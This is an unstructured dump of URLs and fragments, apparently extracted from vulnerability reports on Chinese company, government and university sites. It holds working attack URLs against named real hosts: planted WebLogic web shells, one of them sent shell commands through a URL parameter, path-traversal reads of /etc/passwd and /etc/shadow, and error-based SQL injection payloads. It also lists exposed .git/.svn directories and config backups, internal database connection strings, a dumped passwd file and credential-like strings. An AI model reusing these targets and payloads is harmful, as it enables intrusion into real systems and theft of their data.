http://jscrm.midea.com.cn:8083 http://www.axatp.com/ http://180.168.192.29/ http://star.pflife.com.cn/star/ f873:b49d:c79d:7fb9%11 b4a8:29af:f3:1ae3:3f57:fe39 f3:1ae3:3f57:fe39%19 http://**.**.**.**/sciencefair_article.asp?ItemID=79 http://**.**.**.**/information_article.asp?ItemID=172 http://**.**.**.**/scienceedu_article.asp?ItemID=163 http://**.**.**.**/fair_article.asp?ItemID=184 http://**.**.**.**/ceremony_article.asp?ItemID=199 http://**.**.**.**/news_content.asp?ItemID=290 http://**.**.**.**/info_Doc.asp?ItemID=69 
http://**.**.**.**/otherZ.asp?ItemMenuAID=139 http://**.**.**.**/news_list.asp?JumpPage=2 http://**.**.**.**/otherF.asp?ItemMenuBID=111 http://**.**.**.**/topic_e.asp?ItemPlanID=107 http://**.**.**.**/bulletin_content.asp?ItemID=284 http://**.**.**.**/award_content.asp?ItemID=263 http://**.**.**.**/schedule_content.asp?ItemID=72 http://**.**.**.**/exhibits_article.asp?ItemID=194 http://**.**.**.**/press_list.asp?ItemPressCatID=7 http://**.**.**.**/press_article.asp?ItemID=289 http://61.163.100.203:8888/control/loginUI http://**.**.**.**/job_detail_ch.php?temp_id=1209 http://**.**.**.** http://**.**.**.**:8000/ http://**.**.**.**:8000/w.jsp http://tongxue.open.com.cn:15000/login/index.html http://sto.cn/news_detail.asp?id=101808 http://sto.cn/admin11ww/ http://58.252.101.32:81/ http://58.20.40.247 http://group.cnblogs.com/103902 http://**.**.**.**/www/xb/kqx/ReadNews1.asp?NewsID=1468&BigClassName=%EF%BF%BD%EF%BF%BD%D5%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&SmallClassName=0&SpecialID=0 http://**.**.**.**/www/xb/kqx/admin/login.asp https://**.**.**.**/wuhongyang/tpaas-web/blob/9548461d5fb1fca66fd17c2d3b92b8a8b3323d4b/src/test/resources/webapp/WEB-INF/config/mailServer.properties http://**.**.**.**)主站存在多个SQL注入点,可直接获取数据库信息。 http://**.**.**.**/e_second.php?id=44 http://**.**.**.**/t_second.php?id=29 http://**.**.**.**/s_second.php?id=9 http://dcapp.midea.com.cn/ http://smartvideo.youku.com/#/home http://**.**.**.**/ http://123.124.175.241:8080/uddi/_x.jsp http://123.124.175.235/uddi/_x.jsp http://123.124.175.230:7001/uddi/_x.jsp http://219.143.213.118/ https://**.**.**.**/guest/register?type=retievePassword https://**.**.**.**/guest/register?type=retievePassword http://**.**.**.**:9000/ http://zx.hxlife.com http://joystu.com/ http://**.**.**.**:8080/bi_home/HomeAction_detailpage.do?NewsId=3538&MenuID=M011_002 http://www.chunbo.com/app/download https://github.com/wenjunyang/learn/blob/5232c958ea6b82ee94d671839c59841404037133/python/python_grammar/gzq_login.py 
http://180.168.145.162:7001/ChinalifeAuth/she22.jsp jdbc:sqlserver://10.24.51.5:1433 http://www.jsfxw.com http://www.jsfxw.com/sjsd/sdjs.asp?id=2 http://**.**.**.**/search1.asp http://**.**.**.**/tb/show.asp?id=20516*&pageid=1 http://**.**.**.**/tb/UserInfo.asp?uid=1* http://**.**.**.**//showarticle.php?nid=206 http://www.chunbo.com:80/ http://**.**.**.**/mingyi.php?keshi=11 http://**.**.**.**/mingyi.php?keshi=&name=刘岩 http://**.**.**.**/js http://**.**.**.**/inc http://**.**.**.**/phpinfo.php http://bbs.coolhear.com/config/config_ucenter.php.bak http://home.coolhear.com/config/config_global.php.bak http://drops.wooyun.org/papers/7830 http://bbs.coolhear.com///forum.php?mod=ajax&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=checkusername&username=admin http://**.**.**.**/admin/UserRight.aspx http://**.**.**.**/admin/upload/20151223203124402/index1.ASPX http://svt.whut.edu.cn/show.asp?id=2197 http://182.48.117.37:9001/Console/Account/LogOn http://122.224.237.175:7002 http://122.224.237.175:7002/uddiexplorer/she11.jsp http://**.**.**.**:81/default.aspx http://**.**.**.**:81/default.aspx http://**.**.**.**:81/default.aspx jdbc:oracle:thin:@**.**.**.**:1521:claim root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper 
user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin jdbc:oracle:thin:@**.**.**.**:1521:claim http://182.48.117.8/ http://182.48.117.8/uddiexplorer/sss.jsp http://182.48.117.8/uddiexplorer/out.jsp http://**.**.**.** http://114.251.203.84/ui/ http://114.251.203.84/ui/logon/LogonSubmit.jsp http://114.251.203.84/ui/logon/main.jsp http://mxptest.midea.com/ http://mxptest.midea.com/phpmyadmin/ http://mxptest.midea.com/info.php http://123.126.34.97:7001/ http://123.126.34.97:7001/uddiexplorer/mm.jsp https://crm.htsc.com.cn:8080/getmobileyzm.action http://113.108.133.169/ encap:Ethernet addr:10.122.14.41 Bcast:10.122.14.127 Mask:255.255.255.128 MTU:1500 packets:823831805 packets:598202772 txqueuelen:1000 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-0150867 http://**.**.**.**/ http://**.**.**.**//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/weblogic/domain xmlns:sec="http://**.**.**.**/weblogic/security xmlns:wls="http://**.**.**.**/weblogic/security/wls xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xsi:schemaLocation="http://**.**.**.**/weblogic/security/xacml http://**.**.**.**/weblogic/security/xacml/1.0/xacml.xsd http://**.**.**.**/weblogic/security/providers/passwordvalidator http://**.**.**.**/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://**.**.**.**/weblogic/domain 
http://**.**.**.**/weblogic/1.0/domain.xsd http://**.**.**.**/weblogic/security http://**.**.**.**/weblogic/1.0/security.xsd http://**.**.**.**/weblogic/security/wls http://**.**.**.**/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://**.**.**.**/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://**.**.**.**/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://**.**.**.**/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator xsi:nil="true xsi:nil="true http://scm.fawjiefang.com.cn:81/,导致服务器getshell,并获取数据库连接,拿到大量文件盒数据。 http://211.156.194.185:9437 http://ba.amac.org.cn/login.action http://61.160.82.219:7001/ http://61.160.82.219:7001/uddiexplorer/ss.jsp http://yanbian.fang.com/ http://123.103.37.32 http://123.103.37.32/ http://202.108.253.41/ http://www.gujing.cn:7001/defaultroot/login.jsp http://www.gujing.cn:7001/defaultroot/she11.jsp jdbc:oracle:thin:@192.168.255.119:1521:oa http://**.**.**.**:7001 http://222.66.97.211/ http://222.66.97.211/uddiexplorer/111ss.jsp http://219.143.3.100/ http://219.143.3.100/uddiexplorer/ss.jsp http://222.168.65.184/ http://222.168.65.184/uddiexplorer/11ss.jsp 
http://222.168.65.184/uddiexplorer/out.jsp http://10.7.80.4 http://10.7.80.28 http://10.7.80.5 http://10.7.80.23 http://10.7.80.7 http://10.7.80.6 http://10.7.80.10 http://10.7.80.27 http://10.7.80.48 http://10.7.80.52 http://10.7.80.70 http://10.7.80.74 http://10.7.80.22 http://10.7.80.51 http://10.7.80.49 http://10.7.80.72 http://10.7.80.82 http://10.7.80.80 http://10.7.80.81 http://10.7.80.29 http://10.7.80.42 http://10.7.80.71 http://10.7.80.67 http://10.7.80.69 http://10.7.80.75 http://10.7.80.114 http://10.7.80.2 http://10.7.80.126 http://10.7.80.127 http://10.7.80.124 http://10.7.80.50 http://10.7.80.79 http://10.7.80.131 http://10.7.80.30 http://10.7.80.129 http://10.7.80.120 http://10.7.80.145 http://10.7.80.125 http://10.7.80.73 http://10.7.80.21 http://10.7.80.161 http://10.7.80.166 http://10.7.80.165 http://10.7.80.170 http://10.7.80.173 http://10.7.80.172 http://10.7.80.174 http://10.7.80.159 http://10.7.80.171 http://10.7.80.130 http://10.7.80.192 http://10.7.80.188 http://10.7.80.26 http://10.7.80.197 http://10.7.80.101 http://10.7.80.210 http://10.7.80.25 http://10.7.80.212 http://10.7.80.211 http://10.7.80.216 http://10.7.80.217 http://10.7.80.213 http://10.7.80.94 http://10.7.80.103 http://10.7.80.223 http://10.7.80.229 http://10.7.80.121 http://10.7.80.232 http://10.7.80.233 http://10.7.80.234 http://10.7.80.3 http://10.7.80.254 http://123.126.34.146:7081/uap/login!login.action http://123.126.34.117:7001/ http://123.126.34.117:7001/uddiexplorer/22ss.jsp http://123.126.34.117:7001/tian/ http://123.126.34.117:7001/Fiduys/ http://123.126.34.117:7001/uddiexplorer/reduh.jsp http://cxry.iy-cd.com:8081/RcLogin.action http://www.scrcoabj.com/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://www.scrcoabj.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://118.88.32.114:8081/ http://121.43.74.72:7005/tit-ydcd/ http://121.43.74.72:7005/uddiexplorer/she11.jsp?o=vLogin http://vip.xinhucaifu.com:7001/ 
http://**.**.**.**/villa_info.asp?id=427&type=55 http://114.251.203.84:8000/ http://114.251.203.84:8000/uddiexplorer/33ss.jsp http://114.251.203.84:8000/uddiexplorer/out.jsp http://**.**.**.**/ jdbc:weblogic:sqlserver://**.**.**.**:1433 https://github.com/lijie2015/nmhelper/blob/5faa6a65c25569ff26d512458197f528e33eb11d/src/main/resources/jdbc.properties jdbc:mysql://121.40.63.54:3308/nmbox?useUnicode=true&characterEncoding=utf8 www.xiaominet.com www.xiaominet.com:808/xmbbs/forum.php http://**.**.**.**/,图中标识链接存在漏洞 https://**.**.**.**/zhenghaofan/talentauction/blob/master/src/config/jdbc.properties http://**.**.**.** http://**.**.**.**/ http://www.17tx.com/zhengwu/news_board.php?id=22 http://member1.taobao.com/member/fresh/deliver_address.htm http://member1.taobao.com/member/fresh/deliver_address.htm yilos.com/svc/store/login yilos.com/admin xxx.com/sys http://222.73.173.5:7001/ http://114.251.203.84/ui//f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://114.251.203.84/ui//f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://scm.qdfaw.com/ http://**.**.**.**:8888/index.action https://**.**.**.**/gateway/hydzsw/DzswJYTS/action/KhjytsAction_initOutAdd http://**.**.**.**:90/存在“Java https://**.**.**.**/composer.do?token= http://vipsite.markfairwhale.com/ http://m.zbird.com/auth/password,找回密码页面,输入任意已注册的手机号,点击发送验证码。 http://**.**.**.**主站存在java反序列化weblogic应用 http://manage.chushi007.com/index/logout http://hk.shtvu.edu.cn/ http://hk.shtvu.edu.cn http://www.chunbo.com/.git/config coding:utf-8 www.sanhao.com/.git/config https://github.com/kost/dvcs-ripper都是好东西呢 http://114.251.203.90:9090/login.jsp com:81/.git http://42.159.227.124:81/.git http://**.**.**.** http://ucd.qbao.com/ http://jkb.shtvu.edu.cn/main/default.asp http://jkb.shtvu.edu.cn http://**.**.**.**/member/ http://**.**.**.** http://**.**.**.**/videomanage.asp?type=%E5%A4%A9%E6%B0%94%E9%A2%84%E6%8A%A5 
http://oa.chinapork.com:8000/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%20md5%281122%29%20from%20user%20limit%201%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23 http://oa.chinapork.com:8000/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%20md5%281122%29%20from%20user%20limit%201%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23 http://oa.chinapork.com:8000/ http://**.**.**.**/finance/port/finance_port_in.jsp?port=G3 http://cconline.southernfund.com:9898 http://cconline.southernfund.com:9898/webcall_chat/leaveMessage.jsp http://58.20.114.244/ http://www.baiyimao.com/wgtz/Product/index!showProductDetailsFreshman.action?productId=8ae98fe04da3d912014da3e254d80001 http://114.255.207.162/ http://114.255.207.163/ http://**.**.**.**/phpMyAdmin/ http://**.**.**.**:8000/index.srm http://**.**.**.** http://**.**.**.**/admin/logined.php http://**.**.**.**/site_item_content_2.php?site_map_item_id=307 http://**.**.**.**/site_item_content_2.php?site_map_item_id=291 http://**.**.**.**//upload/fck_upload/1.txt http://update.ztgame.com/home_index.do http://**.**.**.**/newsView.aspx?id=1684 http://pt.ztgame.com http://pt.ztgame.com/.svn/ http://pt.ztgame.com/database/.svn/ http://pt.ztgame.com/database/update_user_detail.php http://**.**.**.**/index.php?g=Admin&m=Public http://portal.ehnchina.com/Clients/Pages/User/OrderDetail.aspx?orderId=46164 http://app.58.com/api/log/api/msgpush/add/bj/1 wicket:interface=:1 http://www.rufengda.com:80/ www.rufengda.com http://**.**.**.**/login.aspx http://58.56.60.68/ http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://114.251.203.84/ui/ http://114.251.203.84/ui/common/easyQueryVer3/EasyQueryXML.jsp 
http://114.251.203.84/ui/indexlis.jsp http://downloadpatch.ztgame.com.cn/web.zip http://www.wenji99.com/?m=product&s=list&brand=%E6%83%A0%E6%99%AEHP&brand_id=623 http://www.wenji99.com/?m=product&s=list&brand=%E6%83%A0%E6%99%AEHP&brand_id=623 http://www.caib.sgcc.com.cn/cms/web/jspdownload.jsp?FileUrl=/etc/shadow http://**.**.**.**/jgsz/dx/read.php?id=125 http://**.**.**.**:8090/ http://**.**.**.**/bugs/wooyun-2015-0152313(弱口令 http://202.108.103.169:9003/Allianture_frame http://101.227.9.117:8080/ http://101.227.9.117:8080/test.html http://rma.zte.com.cn http://210.51.195.23 http://wx.life.ehuatai.com/weixin/AcctServlet http://wx.life.ehuatai.com/weixin/AcctServlet?useropenid=人工马赛克&pubacctopenid=人工马赛克&operation=fwd http://**.**.**.**/hnmh/ http://43.250.14.93:8080/jenkins/ http://43.250.14.93:8080/jenkins/job/biz-passport-adapter-impl/ws/biz-passport-adapter-impl/src/main/java/com/youku/usercenter/biz/user/impl/UserAdapterServiceImpl.java https://113.108.182.3/aiap/other/download.dsr?file=/../../../../../../../../../etc/passwd www.95552.cc:8005 http://122.97.17.78 http://**.**.**.**/login.jsp http://**.**.**.**/ http://**.**.**.**:8001/login/ssoLogin_login2.action http://android.myapp.com/myapp/detail.htm?apkName=net.hoau http://hma.hoau.net:8080/hoauapp/rs/order/querybyuserid/628914 http://www.hoau.net/how/bse/queryByIdContacts.action?contactsIds=92940 http://shipping2.ems.com.cn/user/noActivate?id=XXX https://211.160.44.198/PowerInfoPub/infoPubPage/index.jsp)存在SSRF漏洞。 http://**.**.**.**/ocw/index.php?page=newsContent&id=334 http://www.dzyryd.com/index.jsp http://www.dzyryd.com/root.jsp jdbc:mysql://localhost:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://localhost:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://120.24.181.120:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://47.88.137.148:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull 
jdbc:mysql://localhost:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://**.**.**.**/16891/5ABBC04AAF2EC7C33915ADE4AAA9BA11.apk?fsname=com.xiangyu.mall_V2.3.2_70.apk http://api.feiniu.com/getpassword/sendmessage.do?receiveChannel=1&sendReceiver=18888888888&content=270335&receiveType=3&templateTemp=亲爱的用户您好,您的验证码为##content##&_=1451032868884 http://api.feiniu.com/getpassword/sendmessage.do?receiveChannel=1&sendReceiver=18888888888&content=226540&receiveType=3&templateTemp=尊敬的客户,您好.为答谢您长久以来对飞牛网的支持.飞牛网特送出价值500元的无门槛春节大红包一份.请点击http://www.wooyun.org&_=1451031865099 http://api.feiniu.com/static/js/modules/messageValidation.js http://chudan.ehuatai.com http://chudan.ehuatai.com:9000/zecmd/zecmd.jsp http://chudan.ehuatai.com:9000/myname/index.jsp http://chudan.ehuatai.com:9000/upload5warn/shell.jsp http://chudan.ehuatai.com:9000/upload5warn/JspSpyJDK5.jsp http://zhuanti.95081.com/install/index.php.bak http://zhuanti.95081.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://192.168.1.1/ http://zhuanti.95081.com//data/tang_6611.php http://**.**.**.**/tw/index.jsp http://**.**.**.**/Home/Login.aspx http://**.**.**.** http://mt.sogou.com/app/project/dashboard/project/24421/document/file/1457345 http://**.**.**.**/ http://**.**.**.**/attachment/AddDocsEntirdomainlogin.jsp?owner=1&ownerLevel=1&catalogID=110&showFlag=0&ownerID=31083 http://**.**.**.**/attachment/AddDocsEntirdomainlogin.jsp?owner=1&ownerLevel=1&catalogID=110&showFlag=0&ownerID=31083 http://**.**.**.** http://www.hishop.com.cn/products/ydfx/ https://github.com/jiayaoaaa/Scene-Editor-for-mobile/blob/66d5d699ea1d3648b84134531d6cab35d128ff50/library/class/Util/Email.php https://github.com/liuhaneventown/mice/blob/a0eef0f60961ac987abad40920a1bf22ce9a438b/application/models/sends.php http://60.10.8.85/.svn/entries http://60.10.8.130/.svn/entries http://60.10.8.85/finance/phpinfo.php http://60.10.8.176/memadmin/index.php 
http://wooyun.org/bugs/wooyun-2015-0143449 http://60.10.8.176/phpinfo.php http://**.**.**.**/ http://**.**.**.** http://cms.php.administrator.cctvmall.com/index.php http://**.**.**.**:9090/xianecho.php?htmlid=46211 http://**.**.**.**/cgi-bin/eduman1/system.fcgi?action=9999&U_fldComID=1 http://you.eventown.com.cn http://**.**.**.**/order/bukuan.php http://103.41.143.137:81/login.jsp http://www.art.zjut.edu.cn/workcount/login.asp http://qz6666.com/iframe.html http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc http://zhan.qq.com/default/tpl?screen=1&type=1 http://k.yiban.cn http://wb.west95582.com:8080/newback/ http://wb.west95582.com/wcc/service/ http://wb.west95582.com/wcc/service/index.jsp http://58.56.60.68:8088/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://wx.life.ehuatai.com/weixin/common/jssdkInit.jsp http://wx.life.ehuatai.com/weixin/FreeRisk/zx_first.jsp?token=GiveRiskReceivesinosoftgh_6f6a5558542esinosofto1ShXuJBC4GJqSeaKurlpUROKK3gsinosoft40010314sinosoft000000sinosoft000000sinosoft000000sinosoft00000000000001060178 http://www1.scuec.edu.cn/chcl/show.php?id=1 http://222.168.65.167:7001/uddiexplorer/she11.jsp?o=vLogin jdbc:oracle:thin:@10.6.193.13:1521:qmerpt http://211.155.92.68/images/1ndex.php http://180.76.153.81/ http://180.76.153.81:80/../../../../../../../../../../../../../etc/passwd http://180.76.153.81:80/../../../../../../../../../../../../../etc/shadow http://wx.life.ehuatai.com/weixin/FreeRisk/zx_Save.jsp http://wx.life.ehuatai.com/weixin/FreeRisk/zx_first_1.jsp?token=GiveRiskReceivesinosoftgh_6f6a5558542esinosofto1ShXuJBC4GJqSeaKurlpUROKK3gsinosoft40010314sinosoft000000sinosoft000000sinosoft000000sinosoft00000000000001060178 http://**.**.**.**:7001/defaultroot/sp/login.jsp http://www.medgrade.sdu.edu.cn/downloadfile.php?path= http://www.medgrade.sdu.edu.cn/downloadfile.php?path=config.php 
http://60.28.205.210/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 www.hnticai.com http://1.202.156.246:7001/ifpms-webservice/she11.jsp?o=vLogin http://**.**.**.**:7001/upbcsf/ http://**.**.**.**:7001/bea_wls_internal/she11.jsp?o=vLogin http://**.**.**.**/ http://**.**.**.**//messager/users.data http://**.**.**.**/index.php/Index/show/category_id/4/id/793 http://www.bee.zjut.edu.cn/shxq/admin/login.do http://www.et.zjut.edu.cn/admincp/ http://202.104.30.110:7001/wls-wsat/she11.jsp?o=vLogin http://1.85.2.249/对应card.yaic.com.cn http://1.85.2.249:7001/FCUR/she11.jsp?o=vLogin jdbc:oracle:thin:@10.0.70.90:1521:yazcxt http://**.**.**.**/msdx/app/?action=index&app=listmenu&controller=more&grade_id=1&human_new=new&page=1§ion_id=1&subject_id=all&type_id=all&version_id=all http://balance.cmge.com http://123.126.34.146:7001/ http://123.126.34.146:7001/uddiexplorer/11ss.jsp http://wooyun.org/bugs/wooyun-2015-0163572 http://g.corp.gome.com.cn/storefeedback/ http://**.**.**.**/存在weblogic反序列化 http://www.chinanetwork.com.cn/w8/SConfig/Get?key=ShowPartIntro&_=1450675365709 http://**.**.**.** http://**.**.**.** www.vsnoon.com http://corp.1disk.cn/showtu.aspx?filepath=1 http://222.168.65.186 http://222.168.65.186/uddiexplorer/11ss.jsp http://222.168.65.186/uddiexplorer/out.jsp http://10.7.64.12 http://10.7.64.21 http://10.7.64.35 http://wear.fh21.com.cn http://wx.life.ehuatai.com/weixin/Bonus/BonusPointQrySave.jsp http://wx.life.ehuatai.com/weixin/PolicyServlet?useropenid=o7maojgsY2GNLyHZGGK5bgAf_t7M&pubacctopenid=gh_54c766af31b4&operation=fwdptqry http://220.181.2.185 http://220.181.2.185:8000/../../../../../../../../../../../../../../../etc/passwd 
http://**.**.**.**/reading_certificate/bulletin_view.php?bulletin_view=249 http://survey.pptv.com/ http://**.**.**.** cn:8080/yyoa/checkWaitdo.jsp?userID=1 http://wx.life.ehuatai.com/weixin/VIPServiceServlet http://wx.life.ehuatai.com/weixin/vip/VipMainInput.jsp?useropenid=o7maojgsY2GNLyHZGGK5bgAf_t7M&pubacctopenid=gh_54c766af31b4 http://oa.gykgnmg.com/yyoa/ http://oa.gykgnmg.com/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://www.228.com.cn/integralHome/list--remen-2*-/1/ http://www.ailvxing.com//e/ShopSys/doaction.php?enews=DelAddress&addressid=1592 http://www.ailvxing.com//e/ShopSys/doaction.php?enews=DelAddress&addressid=1592 http://222.66.97.100:9001/ http://222.66.97.100:9001/uddiexplorer/44ss.jsp http://222.66.97.100:9001/uddiexplorer/out.jsp http://oa.sy-yy.com:8989/yyoa/ http://oa.sy-yy.com:8989/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=100 http://219.143.219.79/ http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=ls http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=pwd http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=cat%20config/config.xml http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=find%20/%20-name%20jfhl.jpg http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=ls%20/bea/bea/user_projects/domains/saleweb_domain/web/UI/wwwroot/gw/ http://58.56.128.98:7003/ http://58.56.128.98:7003/uddiexplorer/33ss.jsp http://10.135.108.94 http://10.135.108.95 http://10.135.108.93 http://10.135.108.107 http://**.**.**.**/ http://**.**.**.**/userAttributesView.portal?userId=portal http://**.**.**.**/getBackPasswordByQuestion.portal https://**.**.**.**/ucenter/reg/checkPhone http://114.251.203.52:7001/ http://114.251.203.52:7001/uddiexplorer/55ss.jsp http://pl-lf.gicp.net:3535/picclife.asp http://pl-lf.gicp.net:3535/1111.asp http://wx.life.ehuatai.com/weixin/BindServlet?useropenid=o7maojgsY2GNLyHZGGK5bgAf_t7M&pubacctopenid=gh_54c766af31b4&operation=toBind jdbc:oracle:thin:@**.**.**.**:1521:testdb http://ids.wisedu.com:9081/ 
http://ids.wisedu.com:9081/userAttributesView.portal?userId=portal http://ids.wisedu.com:9081/getBackPasswordByQuestion.portal http://runforfun.vanke.com/web/DownFile.aspx?Path=/web.config http://e.tju.edu.cn/ http://dev.yaic.com.cn http://dev.yaic.com.cn/cfg/ http://**.**.**.** http://hk5.midea.com http://210.77.176.229/isc_sso/login http://210.77.176.229/uddiexplorer/22ss.jsp http://210.77.176.229/uddiexplorer/out.jsp coding:utf-8-*- http://www.ibidian.com/pay/pay/get_server_list http://mtip.tsingtao.com.cn/mblogin.jsp http://**.**.**.**/ http://**.**.**.**/admin/main.asp http://219.143.252.185:90 http://121.193.130.77/ http://www.hongzhoukan.com/alipay/pay_hb_index.php http://www.hongzhoukan.com/red_player.php?id=143&pid=l0142j9uhh2 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://221.6.6.81:7005 http://www.yiban.cn/ http://www.yiban.cn/member/list/group_id/****/puid/**** http://www.yiban.cn/Index/group/Index/group_id/****/puid/**** pass:pa55me http://114.80.198.206/dfjk/ http://114.80.198.206/uddiexplorer/22ss.jsp http://114.80.198.206/uddiexplorer/out.jsp http://114.80.198.206/uddiexplorer/out.jsp http://**.**.**.**/ http://**.**.**.**/js/2.jsp http://**.**.**.** https://mail.jd.com/Erpout/Logon.aspx http://oa.sy-yy.com:8989/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://oa.sy-yy.com:8989/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://oa.sy-yy.com:8989/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds= http://**.**.**.**的密码找回功能 http://**.**.**.**/bugs/wooyun-2015-0151853 
http://**.**.**.**:9200/ http://**.**.**.**)提供技术支持的 http://**.**.**.**/wh/ http://**.**.**.**/wh/views/rewardQuery.jsp?flag=3&code=xxxx http://**.**.**.** http://121.193.130.231:8088/tuimian/ http://**.**.**.** http://**.**.**.**/ http://123.126.34.170:7001 http://123.126.34.170:7001/uddiexplorer/55ss.jsp http://**.**.**.**/brandWallDB.html?pr=0%2B0%2B0%2B8 url:http://wxsaletest.cfldcn.com:5000/ http://111.203.3.94 http://**.**.**.**/flight/FlightEvent2.asp?fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF&hbh=&submit=+%CC%E1%BD%BB+ http://**.**.**.**/flight/FlightEvent2.asp?fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF&hbh=&submit=+%CC%E1%BD%BB+ http://www.xjair.com/article.aspx?id=201511201801521300 http://www.xjair.com/article.aspx?id=201511201801521300 http://www.xjair.com/article.aspx http://**.**.**.**/源码全部泄露 http://user.iyiyun.com http://211.144.92.121:8089/pgdoctor/ http://mycxjd.scuec.edu.cn/ index.php/Home/Article/index/id/100*/module_name/Manage http://mycxjd.scuec.edu.cn http://bot.aili.com jiashuangkuaizi.com/12345678 http://gitlab.corp.jiashuangkuaizi.com/ jiashuangkuaizi.com/jskz123456 